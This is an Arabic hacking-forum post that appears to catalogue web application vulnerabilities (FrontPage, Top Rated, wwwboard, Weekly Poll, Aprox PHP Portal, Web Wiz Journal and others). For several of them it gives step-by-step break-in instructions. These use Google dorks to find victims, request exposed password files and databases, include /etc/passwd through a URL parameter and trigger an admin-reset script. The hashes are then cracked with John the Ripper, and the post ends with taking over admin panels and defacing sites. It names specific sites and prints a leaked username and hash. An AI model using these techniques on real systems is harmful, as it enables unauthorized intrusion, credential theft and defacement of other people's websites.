ان شااء الله اوفق في رفع كل ثغرات المواقع بي هذاا الموضووع كل ثغرات المواقع موجودة هناا
الرقم الثغرة تمكين الشيل
1 Front Page نعم
2 Top Rated نعم
3 wwwBroad/passwd.txt نعم
4 Weekly Poll لا
5 Aprox PHP Portal لا
6 Web Wiz Journal لا
7 Phpnuke لا
8 Wihphoto لا
9 XMB 1.6 Magic نعم
10 YaBB نعم
11 PhpBB 2.0.0 نعم
12 vBulletin 2.2.9 نعم
13 vBulletin 2.3 نعم
14 vBulletin 2.5 نعم
15 XMB 1.8 نعم
16 Web Wiz Forum نعم
17 LinkMax2 لا
18 Include نعم
19 Mailman نعم
20 myPHPNuke نعم
21 PaFileDB 3.1 نعم
=========================
ثغرة الفرونت بيج
ثغرة الفرونت بيج ثغرة منتشرة جداً فى المواقع وهى من الثغرات الى توصلك مباشرة لكلمة السر الخاصة بالمدير وهى مشفرة
1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com
اكتب فى خانة البحث أى من الملفات التالية
Administrator.pwd
Author.pwd
Service.pwd
2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال هذا الموقع http://www.gumbysbigdayout.com/_vti_pvt/
3- راح تلاقيه فتح لك مجلد بدون اندكس به بعض الملفات اختر الملف الذى قمت بكتابته فى محرك البحث
مثلا Service.pwd
4- راح تلاقى الباسورد المشفرة أمامك http://www.gumbysbigdayout.com/_vti_pvt/service.pwd
عليك الآن فك تشفيرها باستخدام برنامج الجوهن وتسطيع تحميله من هذا الرابط
http://www.asbmay.com/Hac/pafiledb....tion=file&id=44
والآن بعد فك التشفير اصبح الموقع ملك لك وصرت انت مديره بالطبع تستطيع رفع الشيل وتجربة حظك مع السرفر والسيف مود
2-
ثغرة Top Rated
ثغرة التوب راتيد أو الأكثر تقييما ثغرة سهلة وفعالة ففى هذه النسخة يوجد اداة فى حالة الطوارئ تقوم بمسح الأدمن وانشاء ادمن افتراضى بيوزر وباسورد واحدة وهى admin فتمتع بها
1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com
اكتب فى خانة البحث top_rated.php
2- راح يطلع لك نتايج كثيرة اغلبها مصاب بهذه الثغرة راختر منها أى موقع
3- امسح هذه الكلمة من عنوان الموقع top_rated.php وأضف بدلاً منها recovery_tools/create_admin_user.php
4- إذا ظهرت لك صفحة فيها التالى
Delete old administrator user ....ok
Create new administrator user ....ok
فمبروك هذا الموقع مصاب بالثغرة والآن اصبح اليوزر نيم admin والباسورد admin
اذهب إلى لوحة التحكم بإضافة هذا الرابط cp.php
وتمتع بالإختراق
أما إن لم يكن الموقع مصاب بالثغرة فاخرج واعد البحث فى موقع آخر ولا تيأس بسهولة
3-
ثغرة wwwboard/passwd.txt
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر وستجده فى هذا الرابط
http://www.asbmay.com/Hac/pafiledb....tion=file&id=44
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع
4-
ثغرة Weekly Poll
عن طريق هذه الثغرة يتم تحميل قاعدة البيانات وبها اسماء المستخدمين وكلات المرور
1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com
اكتب فى خانة البحث web wiz weekly poll
2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com
3- ضيف على الموقع كلمة weekly_poll.mdb بحيث يصبح هكذا www.XXX.com/Poll/weekly_poll.mdb
4- راح تلاقى قاعدة البيانات بدأت تتحمل معك إن كان الموقع مصاب بهذه الثغرة
5- احصل على اسم المدير وكلمة السر ثم ادخل إلى لوحة التحكم وتمتع بالإختراق
===================================
4-
ثغرة Aprox PHP Portal
هذه الثغرة تمكنك من باسوردات المشتركين بالمنتدى المصاب
1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com
اكتب فى خانة البحث Aprox PHP Portal
2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com
3- ضيف على الموقع كلمة index.php?show=/etc/passwd بحيث يصبح هكذا www.XXX.com/index.php?show=/etc/passwd
4- راح تلاقى نفسك امام باسوردات الموقع
5- اخرج باسورد الأدمن واذهب للوحة التحكم وتمتع بالإختراق
=============================================
ثغرة Web Wiz Journal
ثغرة الويب ويز جورنال ثغرة بسيطة وسهلة جداً تمكنك من باسورد الأدمن والتحكم الشامل فى الجريدة
1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com
اكتب فى خانة البحث Web Wiz Journal
2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com/Journal
3- ضيف على الموقع كلمة Journal.mdb بحيث يصبح هكذا www.XXX.com/Journal/Journal.mdb
4- راح يحمل معك قاعدة بيانات الموقع وفيها كل الباسوردات
5- اخرج باسورد الأدمن واذهب للوحة التحكم وتمتع بالإختراق
ترقبــــــــو اهم الثغرات عن قريب ان شاء الله